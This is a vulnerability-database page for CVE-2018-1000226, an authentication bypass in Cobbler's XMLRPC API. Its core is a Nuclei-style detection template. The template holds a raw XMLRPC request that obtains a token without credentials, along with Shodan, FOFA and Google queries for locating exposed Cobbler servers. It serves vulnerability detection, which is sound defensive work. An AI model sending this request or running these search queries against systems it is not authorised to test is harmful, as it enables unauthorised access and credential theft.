| Reporter | Title | Published | Views | Family All 49 |
|---|---|---|---|---|
| CVE-2018-1000226 | 20 Aug 201820:00 | – | cve | |
| CVE-2018-1000226 | 20 Aug 201820:00 | – | cvelist | |
| [SECURITY] Fedora 28 Update: cobbler-2.8.4-5.fc28 | 5 Dec 201801:58 | – | fedora | |
| [SECURITY] Fedora 29 Update: cobbler-2.8.5-0.1.fc29 | 11 Sep 201921:18 | – | fedora | |
| [SECURITY] Fedora 29 Update: cobbler-2.8.4-5.fc29 | 5 Dec 201802:36 | – | fedora | |
| Fedora 28 : cobbler (2018-1d2a79fe1c) | 3 Jan 201900:00 | – | nessus | |
| Fedora 29 : cobbler (2018-22c609e92a) | 3 Jan 201900:00 | – | nessus | |
| openSUSE Security Update : cobbler (openSUSE-2018-952) | 4 Sep 201800:00 | – | nessus | |
| openSUSE Security Update : cobbler (openSUSE-2021-46) | 25 Jan 202100:00 | – | nessus | |
| RHEL 8 : cobbler (Unpatched Vulnerability) | 11 May 202400:00 | – | nessus |
id: CVE-2018-1000226
info:
name: Cobbler - Authentication Bypass
author: c-sh0
severity: critical
description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931.
impact: |
Unauthenticated attackers can bypass authentication to gain unauthorized access, leading to privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler.
reference:
- https://github.com/cobbler/cobbler/issues/1916
- https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000226
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-1000226
cwe-id: CWE-732
epss-score: 0.12484
epss-percentile: 0.95733
cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: cobblerd
product: cobbler
shodan-query: http.title:"cobbler web interface"
fofa-query: title="cobbler web interface"
google-query: intitle:"cobbler web interface"
tags: cve2018,cve,cobbler,auth-bypass,cobblerd,vuln
http:
- raw:
- |
POST {{BaseURL}}/cobbler_api HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<?xml version='1.0'?>
<methodCall>
<methodName>_CobblerXMLRPCInterface__make_token</methodName>
<params>
<param>
<value>
<string>cobbler</string>
</value>
</param>
</params>
</methodCall>
matchers-condition: and
matchers:
- type: dsl
dsl:
- "!contains(tolower(body), '<name>faultCode</name>')"
- type: word
part: header
words:
- "Content-Type: text/xml"
- type: word
part: body
words:
- "<methodResponse>"
- type: regex
part: body
regex:
- "(.*[a-zA-Z0-9].+==)</string></value>"
- type: status
status:
- 200
# digest: 490a00463044022007c5b98b87e8010e1221282cb56b2a79f07a58649d231ad8e003ed128a3c1165022072c5cee373b5e410a46bd0102da3abcf113ce05d66796a8a85af921b0150e84c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation